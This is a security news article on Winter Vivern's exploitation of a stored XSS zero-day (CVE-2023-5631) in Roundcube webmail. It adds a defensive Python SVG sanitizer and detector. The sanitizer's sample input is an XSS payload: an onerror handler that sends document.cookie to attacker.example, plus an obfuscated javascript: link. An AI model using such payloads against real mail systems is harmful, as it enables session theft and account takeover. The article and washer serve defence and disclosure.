An attack group that has been targeting European and Asian government organizations for months has in recent weeks been exploiting a zero-day cross-site scripting (XSS) vulnerability in the open source Roundcube webmail software.
The group is known as Winter Vivern, and researchers from several organizations have been tracking its activities since at least 2020. Many of its targets have been government agencies, think tanks and other government-connected organizations, and it has shown a propensity for exploiting flaws in email and collaboration software. The most recent campaign exploited CVE-2023-5631, a stored XSS vulnerability that an attacker can trigger remotely by sending a specially crafted email: the victim only has to view the message in the Roundcube web interface, and the injected JavaScript then runs in the user's browser with the privileges of the webmail session.
Researchers from ESET observed Winter Vivern sending seemingly benign emails to targets. On analysis, the messages turned out to carry a payload that performs JavaScript injection.
“Surprisingly, we noticed that the JavaScript injection worked on a fully patched Roundcube instance. It turned out that this was a zero-day XSS vulnerability affecting the server-side script rcube_washtml.php, which doesn’t properly sanitize the malicious SVG document before being added to the HTML page interpreted by a Roundcube user,” the researchers said.
“Despite the low sophistication of the group’s toolset, it is a threat to governments in Europe because of its persistence, very regular running of phishing campaigns, and because a significant number of internet-facing applications are not regularly updated although they are known to contain vulnerabilities.”
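The failure ESET describes above is a server-side HTML washer that lets an SVG subtree through without removing the attributes that can execute script. The following is an added example, not Roundcube's own rcube_washtml.php and not the code that was patched; it shows the allowlist shape such a washer needs for SVG (drop unknown elements, strip every on* event handler, and restrict URL-bearing attributes to safe schemes) and, because it reports everything it removed, it doubles as a detector you can run over stored message bodies. The element and attribute allowlists, the `wash_svg` function name, and the sample message body are all constructed for this illustration, and the code assumes the SVG part is well-formed XML (a production washer has to go through an HTML parser, as Roundcube does).

```python
"""Illustrative allowlist washer for inline SVG in HTML email bodies.

Added example, NOT Roundcube's rcube_washtml.php. Element/attribute lists
are hypothetical and deliberately small; anything not listed is removed.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # serialize as <svg xmlns=...>, not <ns0:svg>
ET.register_namespace("xlink", XLINK_NS)

ALLOWED_TAGS = {"svg", "g", "title", "desc", "defs", "use", "a", "text", "tspan",
                "path", "rect", "circle", "ellipse", "line", "polyline", "polygon",
                "image"}
# Local names only; a namespaced attribute such as xlink:href is matched on "href".
ALLOWED_ATTRS = {"id", "class", "width", "height", "viewBox", "x", "y", "x1", "y1",
                 "x2", "y2", "cx", "cy", "r", "rx", "ry", "d", "points", "transform",
                 "fill", "stroke", "stroke-width", "font-size", "href"}
URL_ATTRS = {"href"}
# Scheme allowlist. Browsers ignore tabs/newlines inside "java\tscript:", so the
# value is stripped of control characters and spaces before it is checked.
SAFE_URL = re.compile(r"^(?:https?:|cid:|#)", re.IGNORECASE)


def _local(name):
    """Strip a Clark-notation namespace: '{http://...}svg' -> 'svg'."""
    return name.split("}", 1)[1] if name.startswith("{") else name


def wash_svg(markup):
    """Return (clean_markup, findings) for one SVG document.

    findings lists every element and attribute that was removed, so the
    same routine can be used as a detector over stored messages.
    """
    root = ET.fromstring(markup)
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    findings = []
    _wash_element(root, findings)
    return ET.tostring(root, encoding="unicode"), findings


def _wash_element(elem, findings):
    tag = _local(elem.tag)
    # Attributes first: event handlers and script URLs are the XSS vectors.
    for attr in list(elem.attrib):
        name = _local(attr)
        value = elem.attrib[attr]
        if name.lower().startswith("on"):
            findings.append(f"<{tag}>: dropped event handler {name}")
            del elem.attrib[attr]
        elif name not in ALLOWED_ATTRS:
            findings.append(f"<{tag}>: dropped attribute {name}")
            del elem.attrib[attr]
        elif name in URL_ATTRS:
            compact = re.sub(r"[\x00-\x20]", "", value)
            if not SAFE_URL.match(compact):
                findings.append(f"<{tag}>: dropped unsafe URL in {name}: {value[:40]!r}")
                del elem.attrib[attr]
    # Then children. Collect first: removing while iterating skips siblings.
    for child in list(elem):
        if _local(child.tag) not in ALLOWED_TAGS:
            findings.append(f"dropped element <{_local(child.tag)}>")
            elem.remove(child)
        else:
            _wash_element(child, findings)


# Constructed sample message body for this example (not an in-the-wild payload).
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="10" height="10">
  <rect x="0" y="0" width="10" height="10" fill="red"/>
  <image xlink:href="x" onerror="fetch('https://attacker.example/?c='+document.cookie)"/>
  <a href="java&#9;script:alert(1)"><text x="1" y="8">link</text></a>
  <script>alert(1)</script>
</svg>"""

if __name__ == "__main__":
    clean, findings = wash_svg(SAMPLE_SVG)
    for f in findings:
        print("REMOVED:", f)
    print(clean)
```

Two design points matter more than the particular lists. First, the washer is an allowlist: an unknown element or attribute is removed, so a parser quirk the author never thought of fails closed rather than open. Second, the decision about URL attributes is made on a normalized copy of the value, because the browser will happily treat `java<TAB>script:` as `javascript:`. Relative URLs such as `href="x"` are also dropped here; inside a webmail application a relative reference resolves against the application's own origin, which is rarely what an email legitimately needs.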
Roundcube is a free and open source, browser-based IMAP email client written in PHP. First released in 2008, it runs on many different platforms and is commonly self-hosted by organizations that run their own mail infrastructure, which is why an XSS bug in its message rendering is attractive to a group that lives on phishing.
The bug affects Roundcube 1.6.x before 1.6.4, 1.5.x before 1.5.5 and 1.4.x before 1.4.15; upgrading to one of those releases is the fix. ESET reported the vulnerability to the Roundcube maintainers on Oct. 14, and the team released the updated versions to address it on Oct. 16. Administrators who are unsure which release they are running can check the About dialog in the web interface or the RCMAIL_VERSION constant defined in program/include/iniset.php on the server.
Researchers believe that Winter Vivern may be working in alignment with the interests of the Belarusian government. The group has exploited known vulnerabilities in other software in the past, including a separate, older bug in Roundcube and one in Zimbra, and historically has targeted government organizations in Europe and Asia in its campaigns.